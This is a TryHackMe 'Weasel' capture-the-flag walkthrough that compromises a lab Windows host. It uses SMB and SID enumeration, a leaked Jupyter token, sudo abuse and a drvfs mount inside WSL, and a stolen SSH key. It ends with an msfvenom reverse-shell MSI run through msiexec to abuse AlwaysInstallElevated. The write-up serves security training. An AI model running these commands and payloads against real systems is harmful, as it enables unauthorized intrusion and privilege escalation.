🛤️ TryHackMe RoomsWeasel Logging via Jupyter Tokens - Mounting WSL for PrivEsc1 - Logging via SSH key - Finding AutoLogon Creds - Abusing AlwaysInstallElevated feature for PrivEsc2
Scanning
Starting off with a Nmap scan
Copy 22/tcp open ssh syn-ack OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBae1NsdsMcZJNQQ2wjF2sxXK2ZF3c7qqW3TN/q91pWiDee3nghS1J1FZrUXaEj0wnAAAbYRg5vbRZRP9oEagBwfWG3QJ9AO6s5UC+iTjX+YKH6phKNmsY5N/LKY4+2EDcwa5R4uznAC/2Cy5EG6s7izvABLcRh3h/w4rVHduiwrueAZF9UjzlHBOxHDOPPVtg+0dniGhcXRuEU5FYRA8/IPL8P97djscu23btk/hH3iqdQWlC9b0CnOkD8kuyDybq9nFaebAxDW4XFj7KjCRuuu0dyn5Sr62FwRXO4wu08ePUEmJF1Gl3/fdYe3vj+iE2yewOFAhzbmFWEWtztjJb
| 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOGl51l9Z4Mg4hFDcQz8v6XRlABMyVPWlkEXrJIg53piZhZ9WKYn0Gi4fKkzo3blDAsdqpGFQ11wwocBCSJGjQU=
| 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOHw9uTZkIMEgcZPW9Z28Mm+FX66+hkxk+8rOu7oI6J9
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2023-06-12T16:00:35+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DEV-DATASCI-JUP
| Issuer: commonName=DEV-DATASCI-JUP
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-03-12T11:46:50
| Not valid after: 2023-09-11T11:46:50
| MD5: 1671:b190:2eb6:b15f:0c3f:ab16:d3e6:6582
| SHA-1: c007:197a:dd30:f17f:2bdb:65f8:1804:fc6f:d081:c7c9
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQPvhxvXPCnJtIgyPRvn3WzjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9ERVYtREFUQVNDSS1KVVAwHhcNMjMwMzEyMTE0NjUwWhcNMjMw
| OTExMTE0NjUwWjAaMRgwFgYDVQQDEw9ERVYtREFUQVNDSS1KVVAwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQD1iFFVyhggpi7wL6i/UpivF4ynWEUALMJh
| v8t3ypgM+Vrdp7sqDQciG7YMfGhYyz3Za4G03Ppgi+DUu/2qsYfGJbllz8IRaelq
| 5G5DPGSy0lYItHbWEvPbPSWTcEOrxQMIv98lBx5fHbmzIP1mEeIiS7p8bpWGfFuR
| Y/zvTOOWRHcT09/z+6YDdCTztLIgtrE+ZFW1yNUYxqCPl6EdKutmIzDUCDFUyvhq
| jOuv1R3M9XGPGomb99tAdPWQeXwjQfNrJdEsJ0DBz3D9T2pbfVwKINfDt1qCQfPO
| zu9v8OZhe+BYvS6289GNmCbiaCVbeJK2yokPdMFx4uLIT85U7IKBAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAiVcJyTne2cl+bKhmctqIva2DA/v9P0odeZe1hO8TG7J4UZGeK5bOqwdE
| bPDKBuxD+QYXWLm+/eHgKKMwKemYp4iDcIMGfb5UgzkRe8RaI5kKiiPQSarFKIZe
| WphDWZrLDo9IN58b081R4k82IfGv7yXtIjZcral4fCEHhhTdVE2CvHvE1JGXSWbY
| NHoufyrjizsaLHAchdnuHgaz+cgcFgR/hD61vQpc8pW+v6xDNVtMFVdv7lLtbWov
| /dcC6Yd2jtk8sP7ue7K+FOhLaw9UDbji3XCXn0FoJwKBza/K8smP0M/3fHIqoFA2
| mc4b7D2CUHt9FNWIWyz9evlNAOixvg==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: DEV-DATASCI-JUP
| NetBIOS_Domain_Name: DEV-DATASCI-JUP
| NetBIOS_Computer_Name: DEV-DATASCI-JUP
| DNS_Domain_Name: DEV-DATASCI-JUP
| DNS_Computer_Name: DEV-DATASCI-JUP
| Product_Version: 10.0.17763
|_ System_Time: 2023-06-12T16:00:26+00:00
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8888/tcp open http syn-ack Tornado httpd 6.0.3
|_http-favicon: Unknown favicon MD5: 97C6417ED01BDC0AE3EF32AE4894FD03
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
| http-methods:
|_ Supported Methods: GET POST
|_http-server-header: TornadoServer/6.0.3
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49674/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-06-12T16:00:28
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26077/tcp): CLEAN (Couldn't connect)
| Check 2 (port 11157/tcp): CLEAN (Couldn't connect)
| Check 3 (port 33818/udp): CLEAN (Timeout)
| Check 4 (port 36841/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked Let's make some mental notes !
Port 22 is open, we need a valid credentials to log in
Port 135, let's check if there are any anonymous logins enables, so that we can enumerate usernames - enumdomusers
Port 139&445, check for anonymous logins and open SMB shares
Port 8888, Tornado HTTP server running Jupyter Notebook - Maybe our Initial foothold !
Enumeration
Starting off with the SMB Enumeration !
Copy $ crackmapexec smb 10.10.146.197 -u 'anonymous' -p 'anonymous' --shares Monday 12 June 2023 09:32:51 PM
SMB 10.10.146.197 445 DEV-DATASCI-JUP [*] Windows 10.0 Build 17763 x64 (name:DEV-DATASCI-JUP) (domain:DEV-DATASCI-JUP) (signing:False) (SMBv1:False)
SMB 10.10.146.197 445 DEV-DATASCI-JUP [+] DEV-DATASCI-JUP\anonymous:anonymous
SMB 10.10.146.197 445 DEV-DATASCI-JUP [+] Enumerated shares
SMB 10.10.146.197 445 DEV-DATASCI-JUP Share Permissions Remark
SMB 10.10.146.197 445 DEV-DATASCI-JUP ----- ----------- ------
SMB 10.10.146.197 445 DEV-DATASCI-JUP ADMIN$ Remote Admin
SMB 10.10.146.197 445 DEV-DATASCI-JUP C$ Default share
SMB 10.10.146.197 445 DEV-DATASCI-JUP datasci-team READ,WRITE
SMB 10.10.146.197 445 DEV-DATASCI-JUP IPC$ READ Remote IPC Since we have READ permission over the $IPC share, let's enumerate some usernames !
Copy $ impacket-lookupsid 'weasel.thm/anonymous@10.10.146.197' -no-pass | tee usernames.txt 13.5s _ Monday 12 June 2023 09:34:19 PM
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.146.197
[*] StringBinding ncacn_np:10.10.146.197[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2336295375-1619315875-398172279
500: DEV-DATASCI-JUP\Administrator (SidTypeUser)
501: DEV-DATASCI-JUP\Guest (SidTypeUser)
503: DEV-DATASCI-JUP\DefaultAccount (SidTypeUser)
504: DEV-DATASCI-JUP\WDAGUtilityAccount (SidTypeUser)
513: DEV-DATASCI-JUP\None (SidTypeGroup)
1000: DEV-DATASCI-JUP\dev-datasci-lowpriv (SidTypeUser)
1001: DEV-DATASCI-JUP\sshd (SidTypeUser)
$ cat users Monday 12 June 2023 09:36:05 PM
500: DEV-DATASCI-JUP\Administrator (SidTypeUser)
501: DEV-DATASCI-JUP\Guest (SidTypeUser)
503: DEV-DATASCI-JUP\DefaultAccount (SidTypeUser)
504: DEV-DATASCI-JUP\WDAGUtilityAccount (SidTypeUser)
513: DEV-DATASCI-JUP\None (SidTypeGroup)
1000: DEV-DATASCI-JUP\dev-datasci-lowpriv (SidTypeUser)
1001: DEV-DATASCI-JUP\sshd (SidTypeUser)
cat users | grep SidTypeUser | cut -d '\\' -f 2 | cut -d '(' -f 1 > valid_users Monday 12 June 2023 09:36:08 PM
cat valid_users Monday 12 June 2023 09:36:48 PM
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
dev-datasci-lowpriv
sshd Now let's explore some open shares !
Wow cool we have a jupyter token, which acts as a password - Now let's login through the HTTP port !
We can either now edit an existing .ipynb file and insert our python reverse shell to have the initial foothold or we can directly get a terminal on the New option !
GNU/Linux indicates that the OS is linux
DEV-DATASCI-JUP is the hostname or the machine name
4.4.0-17763-Microsoft is the kernel version of the Linux operating system
(base) in the Linux prompt refers to some kinda virtual env
#2268-Microsoft is the build number or the patch level of that kernel
After all this recon, we can guess that we are in a WSL (Windows Subsystem for Linux), where the main host is Windows and we are in the linux currently installed in the WSL
The dev-datasci-lowpriv_id_ed25519 looks like a private ssh key for the user dev-datasci-lowpriv user, initially found in the start !
Privilege Escalation - via Mounting WSL
Let’s see the sudo privileges, what can our user run in the system !
So, we can run /home/dev-datasci/.local/bin/jupyter with sudo privileges.
Let’s see the permissions we have over this file !
Cool, let's copy our /bin/bash to the desired location and exec it as a sudo user !
Okay so now we are root inside the WSL, let's check for the flags !
Looks like the host windows system isn't mounted yet ! So let’s mount it. The process of mounting is given in this stack overflow page
Copy mount -t drvfs 'c:' /mnt/c -t drvfs : This option specifies the type of file system to be mounted. In this case, drvfs refers to the file system driver used by WSL to access Windows drives
Privilege Escalation - via AlwaysInstalledElevated Feature
So we had the dev-datasci-lowpriv user's ssh keys - let's logon to that acc
We've directly entered as a windows user :)
Let's run Winpeas now
Copy wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe AlwaysInstallElevated is a windows feature that allows standard user account with no administrative privileges software packaged in the Microsoft Windows Installer (MSI) format with admin privs ! - How do we abuse it now ?
We can leverage this configuration to elevate our privileges by generating a custom executable with the MSI format
We can utilize the msiexec utility to execute the MSI executable, which will give us an elevated session
The Always Install Elevated feature is configured in the Windows Registry
Craft a payload with msfvenom and transfer to it to the victim machine - Meanwhile setup the listener !
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST= < KALI-I P > LPORT= < POR T > -f msi > setup.msi On the victim machine execute the executable using msiexec
Copy msiexec /qn /i [absolute location of executable] msiexec is a command utility to install msi package
/qn => meaning installation should happen quitely without any promt or anything
/i => signifies to install the package !
But on executing , the shell doesn’t popup on the backend :(
A solution to this can be using runas command
Runas command is just like sudo in linux we can justify the user through which we want to run a specific command !
Copy runas /user:[username] "command" So let's run this command !
Copy runas /user:dev-datasci-lowpriv "msiexec /quiet /qn /i C:\Users\dev-datasci-lowpriv\Desktop\malicious.msi" This will ask you the password of the user , which we have retireved as well , let’s enter that and execute it
We are ROOT now :)
